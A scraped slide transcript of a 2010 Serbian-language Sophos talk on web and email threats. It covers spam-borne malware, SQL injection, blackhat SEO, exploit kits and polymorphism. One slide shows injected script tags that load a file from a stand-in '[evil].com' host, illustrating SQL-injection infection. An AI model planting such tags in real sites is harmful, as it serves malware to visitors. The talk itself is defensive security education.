1 / 81

Ana tomija napada – duhovi u mašini

Ana tomija napada – duhovi u mašini. Vanja Svajcer Principal Researcher – Sophos Beograd, 13 Maj 2010. Šta radi SophosLab s ?. Sakuplja pretnje Analizira i klasifikuje Kreira detekcije i otklanja pretnje Objavljuje sveže definicije i informacije Istraživanje i razvoj

linnea
Download Presentation

Ana tomija napada – duhovi u mašini

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Anatomijanapada – duhovi u mašini Vanja Svajcer Principal Researcher – Sophos Beograd, 13 Maj 2010

  2. Šta radi SophosLabs? • Sakuplja pretnje • Analizira i klasifikuje • Kreira detekcije i otklanja pretnje • Objavljuje sveže definicije i informacije • Istraživanje i razvoj • Nešto više informacija videćemo kasnije

  3. SophosLabsu samom centru

  4. Anatomija napada • Postavljanje scenarija • Zlonamerni softver (Malware) • Tehnike napada • Proces analize i alati • Tehnologija zaštite

  5. Tipovi malicioznog softvera • Virus • Trojanac • Crv (Worm)

  6. Ko se nekada bavio pisanjem virusa? Nema „standardnog“ pisca virusa, nema „standardnog“ motiva za pisanje Školarci Srednjoškolci Studenti IT profesionalci Uglavnom muškarci Nikako A/V kompanije

  7. Ko piše malver danas? Virusi se retko viđaju, ali čini se da opet postaju popularni U pitanju je novac U osnovi se svodi na kriminal ( I dalje postoji tamo neki pegavi tinejdžer…)

  8. APT • Advanced Persistent Threat • Moderan izraz za “targeted malware” • Mala veličina (oko 100k) i posebne namene • Nema pakovanja • Izgleda kao legitiman Windows fajl • Neovlašćeni prikriveni transfer podataka (Data Exfiltration) • Težak za uklanjanje

  9. Email pretnje • Druga polovina 2008. bila je svedok dramatičnog porasta malverau obliku priloga email-a • 2009.taj trend se nastavlja,nekoliko familija se širi agresivnimmasovnim spemovanjem • Iste stare taktike socijalnog inženjeringa • UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets itd.

  10. Top spemovani malver (2009) • Dominiraju ključne familijemalvera • Bredo • Waled • Jednostavnoali i dalje radi!

  11. Socijalni inženjering – Bredo Mal/Bredo • Ista kampanja može obuhvatati brojne “različite” priloge

  12. Socijalni inženjering – Zbot (aka Zeus) Mal/Zbot

  13. BredovsZbot • Konkurencija između botova!!! • Bredopokušava da onemogući bilo koji instalirani Zbot • Vrlo slično poput NetskyvsBaglerata od pre par godina!!!

  14. Email pretnje • Globalnespem zamke za praćenje spema • SADusmerava više spema nego bilo koja druga pojedinačna država • Kompromitovani računari ne samo što šire spem već distribuiraju malver i lansiraju DDoS napade

  15. Web najdominantniji • 99% inficiranih sistema su legitimni kompromitovani sajtovi • Sajtovi za napad • Botnet C&C korišćenjem HTTP • Napadi i dalje često počinju spemovanjem email-a

  16. Napadi Web 2.0 aplikacija

  17. Korak1: preusmeravanje sa kompromitovanog sajta Kompromitovani web sajtovi Attacker-controlledredirects Attack site usingbundle of exploits Payload

  18. Kompromitovanje hostova

  19. SQL injection DB DB DB Malicious SQLinjection • Hakeri koriste alate da identifikuju stranice potencijalno ranjive na SQL injection • Šalju maliciozneHTTP zahteve (Demo)

  20. SQL injection <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http://[evil].com/file.js • SQL injection uzrokuje da baza podataka postane zabiberena malicioznim skript tagovima • Kao rezultat, stranice na web serveru izgrađene od podataka preuzetih iz baze takođe sadrže maliciozne skript tagove

  21. SQL injection • Korisnik se kreće web sajtom • Maliciozni skript tag prikrivenoučitava skript sa udaljenog servera • Žrtva postaje inficirana malverom:Asproxtrojan

  22. Demo SQLi + XSS

  23. Novootkrivene inficirane stranice – april 2010

  24. Blackhat SEO • Kompromitovani hostovi zasejani sa SEO-kitovima • Povećavaju rangiranje stranice

  25. SEO trovanje • Pretraga po popularnim rečima

  26. Blackhat SEO

  27. Blackhat SEO

  28. Demo Blackhat SEO

  29. Vidljivost – sajtovi koji hostuju SEO-kitove

  30. Korak3: Preuzimanje sadržaja sa napadačevog sajta Kompromitovani web sajtovi Preusmeravanja kojakontroliše napadač Sajt za napad koristi više kombinovanih ranjivosti Payload

  31. Web napadi Izrađen korišćenjem kupljenih kompleta alata MPack, IcePack, GPack,Neosploit, Eleonore, Yes Konzola za upravljanje Phishing Otkriven: 19. oktobra 2009. • Najpogođenije države: • Francuska – 4% • SAD– 17% • Velika Britanija – 3% • Nemačka – 6%

  32. Web napadi Pregled po programimaza pregled Internet sadržaja! Polimorfizam sa serverske strane • Procenat pogođenih: • MSIE – 12% • FireFox – 1% • Opera – 5%

  33. Polimorfizam

  34. Polimorfizam

  35. Polimorfizam

  36. Polimorfizam

  37. Polimorfizam

  38. Slabosti polimorfnog malvera • Poly-engine je deo koda • Može biti reverzovan od strane upornog istraživača • Mora biti dekriptovan u memoriji • Emulira programski kod dok se ne nađe prava varijanta • Detekcija može biti bazirana po proceduri dekripcije

  39. Polimorfizam sa serverske strane

  40. Polimorfizam sa serverske strane

  41. Polimorfizam sa serverske strane

  42. Polimorfizam sa serverske strane

  43. Demo SSP

  44. Korak4: Napadni žrtve kroz ranjivosti, zarazi ih Kompromitovani web sajtovi Preusmeravanja kojakontroliše napadač Sajt za napad koristiviše kombinovanih ranjivosti Tovar

  45. Lažni AV profesionalizam

  46. Video - scareware

  47. Troj/MacSwp

More Related